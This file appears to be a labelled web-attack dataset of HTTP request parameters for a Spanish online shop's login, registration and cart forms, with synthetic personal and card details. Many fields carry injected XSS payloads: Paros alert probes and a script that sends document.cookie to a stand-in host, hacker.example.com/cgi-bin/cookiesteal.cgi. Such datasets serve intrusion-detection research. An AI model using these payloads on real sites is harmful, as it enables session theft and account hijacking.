entrar | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | 84m3ri156 | on | Entrar HTTP/1.1
"registro | thyagara | fUeRTe | Sol | Gorgone Oteo | tissier@b-sign.cg | 03028605B | Calle Alboran 39,  | Millanes | 49731 | Tarragona | 4096797311989091sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Registrar HTTP/1.1"
bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
"registro | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | crIn+Ada | Aliberta | Gochez | kubler5@porqueagel.ps | 49372725M | Calle Barrio De La Torre 163,  | Alar del Rey | 22770 | Toledo | 5546440906293369 | Registrar HTTP/1.1"
sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"registro | sabadash | gurullada | Sergio | Dinardi Compres | wences.seigner@aldufa.es | 92012174F | Valldemosa, 129 4H | Frumales | 19490 | Valencia | 5024784015351535<SCRIPT>alert(""Paros"");</SCRIPT> | Registrar HTTP/1.1"
bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | 898 | Confirmar HTTP/1.1
"entrar | <SCRIPT>alert(""Paros"");</SCRIPT> | CarMinAR | on | Entrar HTTP/1.1"
"registro | waltdisn | AC4iNiA | Yasmila | Monerris Brau | dearden@hipermadrid.ga | 83203700G | C/ Flors, 115  | Navas de Orosessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | 32782 | Zaragoza | 0851365114838541 | Registrar HTTP/1.1"
2sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"entrar | mathews | 6u1ad5<SCRIPT>alert(""Paros"");</SCRIPT> | on | Entrar HTTP/1.1"
insertar | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Pasar por caja HTTP/1.1
insertar | 6715bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Pasar por caja HTTP/1.1
entrar | han-van | p41en4t63o | on | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
Vaciar carritobob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
"insertar | 9805 | Pasar por caja<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
entrar | laforgesessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | o1R8me956 | off | Entrar HTTP/1.1
insertar | 9168 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
insertar | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Confirmar HTTP/1.1
3 | Vino Rioja | 39 | 4 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"Vaciar carrito<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
"1<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
"registro | bejar | litiGaR<SCRIPT>alert(""Paros"");</SCRIPT> | Enzo | Capell Latre | borgato@19horas.ee | 96483882D | Esperanto, 182,  | Sobremunt | 19278 | Alicante | 2319237634289833 | Registrar HTTP/1.1"
2bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
Vaciar carritosessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"2<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | 2794 | Confirmar HTTP/1.1
entrar | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | 46inquet48a | on | Entrar HTTP/1.1
"registro | cecelia | terciopelado | Federica | Heusser Talo | sofaer@multasdetransito.cu | 67293578V | Plza. Irantzuko Monasterioaren 63,  | Purullena | 41111<SCRIPT>alert(""Paros"");</SCRIPT> | Lleida | 7562944888996473 | Registrar HTTP/1.1"
"registro | plsntp1 | c!uartilludo | Generosa | Obrador Scolari | metanee4@martosfutbolsala.us | 55023331V | Cuesta De La Independencia 107 7?H | Bastida, La | 50268 | Guadalajara | 7559315491846404sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Registrar HTTP/1.1"
bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | beasley | narcisismo | off | Entrar HTTP/1.1
insertar | 9437 | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
Credenciales incorrectassessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"Credenciales incorrectas<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
1bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
insertarbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | 7832 | Confirmar HTTP/1.1
"<SCRIPT>alert(""Paros"");</SCRIPT> | marlee-j5 | ple4n637127 | on | Entrar HTTP/1.1"
"insertar | <SCRIPT>alert(""Paros"");</SCRIPT> | Pasar por caja HTTP/1.1"
insertarbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | 2248 | Confirmar HTTP/1.1
1sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
registro | bat | escuda4 | Casia | Alert Farreron | olarova@ssextremadura.bg | 13843179P | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Oia | 04531 | Huelva | 2507926371320953 | Registrar HTTP/1.1
"entrar | hua-yuan | *anoria | off | <SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
Credenciales incorrectasbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
"registro | snarr | aocar | Romari | Astorga | laine-devlin@telogis.tl | 38236531C | Carlos Maurras, 53  | Brazatortas | 47318<SCRIPT>alert(""Paros"");</SCRIPT> | Teruel | 1539106035022120 | Registrar HTTP/1.1"
entrar | meaghan | SUspIRAr | off | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
entrar | mandel | tras3jada | off | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
entrar | devore | por35zo | on | Entrarsessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
insertar | 4014 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
entrar | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | culero | on | Entrar HTTP/1.1
"registro | checinsk | c2ad953u8ro | Neria | Taronger | torgov-mattera@yksoluap.edu | 74014005M | Avenida Roque De Gando, 193, 7?E | Castrobol | 26324 | Cuenca | 5680554856223107<SCRIPT>alert(""Paros"");</SCRIPT> | Registrar HTTP/1.1"
"<SCRIPT>alert(""Paros"");</SCRIPT> | 9353 | Confirmar HTTP/1.1"
insertar | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Confirmar HTTP/1.1
entrar | dedie | M50879RIST44 | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Entrar HTTP/1.1
"registro | wenham | coNdE2s80TE | Valeria | Valero Tolaba | goldner-gadsdon@candidaturaolle-futuronotarial.eu | 66020343Q | Plza. Altozano 72,  | Tragacete | 16639 | Burgos | 0271947450207950 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1"
2 | Vino Rioja | 39 | 25 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"registro | gavens0 | revirado | Kaya | Mojeda Batet | munshin@cirugiaplasticacordoba.hk | 65532112Y | Plaza Flauta 16, 1?Bbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Valdeavellano de Tera | 08672 | Teruel | 2452355001922764 | Registrar HTTP/1.1"
"registro | billi | cORnIveleTa | Helenabob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Gomar Buera | eden_barham5@esposa.com.bf | 93515707F | C/ Medico Garcia Martinez 72,  | Rubiales | 05571 | Tarragona | 4967960229391818 | Registrar HTTP/1.1"
"<SCRIPT>alert(""Paros"");</SCRIPT> | 5299 | Confirmar HTTP/1.1"
"registro | hartmann | al55nza | Randolfo | Rovirola Noiran | semmelrogge@spainpharma.zm | 73500117Ybob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Pl. Aranjuez, S/N  | Sobremunt | 18127 | Tarragona | 1198702099336688 | Registrar HTTP/1.1"
registro | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | ali0557ra | Jaled | Miralles Casola | manni@yiutuve.mk | 37782618N | Travessera De Gracia 53  | Tollos | 23264 | Pontevedra | 5024784015351535 | Registrar HTTP/1.1
"registro | jada | 0a3gan861 | Asad | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | seward_sepulvede@promotorareina.bt | 05599581R | Cuesta Del Mercadillo, 30  | Valdemeca | 44367 | Palencia | 2588788031004045 | Registrar HTTP/1.1"
entrar | kolahi45 | pr0to | on | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"registro | myong | colOrISmo | Dagmar | Cabane Molas | holton@enigmatico.vu | 91624095F | Don Ferreol Hernandez S/N,  | Calders | 37183 | Salamanca | 6035116303925311 | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1"
insertarbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | 2114 | Pasar por caja HTTP/1.1
"sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | leilah | c0855m05l13 | Rachid | Specie | tansey@cohel.tel | 85978887B | C/ Uruguay, 17,  | Sitges | 08840 | Salamanca | 2191408173155775 | Registrar HTTP/1.1"
"entrar | oyama | chiapa | on | <SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
insertar | 1859 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
insertar | 4110 | Confirmarsessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
entrar | zeigler | 7ERVAnT0F2La | off | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org HTTP/1.1
"<SCRIPT>alert(""Paros"");</SCRIPT> | merlina | l12o3o | Heloisa | Senini | odea-chua@prestigecars.de | 51011537K | Passatge Amerigo, 164,  | Valdeltormo | 46175 | Zamora | 4467025067468073 | Registrar HTTP/1.1"
"entrar | mobley | esc1lo6-i1 | off | Entrar<SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
"entrar | cushing | 614n3r9 | off | <SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
"insertar | 1543 | <SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
"registro | snuggs | Recie.ntE | Caritian | Celaya Gaytan | treman_worde@pavimentosalagon.so | 75925253E | Carrer Sant Celoni 39, 8-H | Cepeda la Mora | <SCRIPT>alert(""Paros"");</SCRIPT> | Sevilla | 0439326406567851 | Registrar HTTP/1.1"
entrar | bowden | mel-enerabob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | off | Entrar HTTP/1.1
entrar | tres-sup | qui4erear | onbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Entrar HTTP/1.1
3 | Queso Manchego | 39 | 45 | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
"registro | montijo | remot4 | Mailena | Buj Andunce | griffel@camilafansite.pt | 93865245Zsessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Doctor Ulecia, 158  | Valdunquillo | 31498 | Tarragona | 5319876028160549 | Registrar HTTP/1.1"
"registro | jamilahbob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | e0f2n87a | Virma | Duch Vilarnau | rosamond_aloyshina@videospornocaseros.aq | 84711932B | Alfredo Donay 178,  | Casas del Monte | 17650 | Toledo | 7712379186246495 | Registrar HTTP/1.1"
"insertar<SCRIPT>alert(""Paros"");</SCRIPT> | 1700 | Pasar por caja HTTP/1.1"
entrar | hisko | misionerasessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | off | Entrar HTTP/1.1
insertar | 3076sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Confirmar HTTP/1.1
sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | 2939 | Pasar por caja HTTP/1.1
"entrar | thisner9 | <SCRIPT>alert(""Paros"");</SCRIPT> | off | Entrar HTTP/1.1"
"registro | schaffel3 | 5ub9ltern3nte | Teinad | Agraso Feixas | callam@mtos.by | 32857731T | C/ Leon Felipe, 31  | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | 44589 | Palencia | 4714732630974118 | Registrar HTTP/1.1"
entrar | tailor | inju2i44t2 | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Entrar HTTP/1.1
insertar | 9085bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Pasar por caja HTTP/1.1
"entrar<SCRIPT>alert(""Paros"");</SCRIPT> | van_kess | 3ran48 | on | Entrar HTTP/1.1"
insertar | 6908 | Confirmarsessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> HTTP/1.1
registro | gabrila | 2r092ri06s6 | Iverna | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | boxleitner-cremiewx@novisa.tv | 59188627J | Calle Alfredo Blanco 25  | Peleas de Abajo | 19278 | Salamanca | 1505484451430102 | Registrar HTTP/1.1
"insertar | 900 | <SCRIPT>alert(""Paros"");</SCRIPT> HTTP/1.1"
entrar | crigger | AcRIBaDorasessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | off | Entrar HTTP/1.1
"registro | archy | 83*4r31l7 | Jimy | Bassas Sancliment | sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | 75288361T | Calle Versalles, 58  | Bercero | 50155 | Zaragoza | 7133167729041285 | Registrar HTTP/1.1"
insertar | 2612sessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | Pasar por caja HTTP/1.1
entrar | benefielsessionid=12312312& username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie</script> | duc9i89 | on | Entrar HTTP/1.1
entrar | benefiel | duc9i89 | bob@<SCRipt>alert(Paros)</scrIPT>.parosproxy.org | Entrar HTTP/1.1
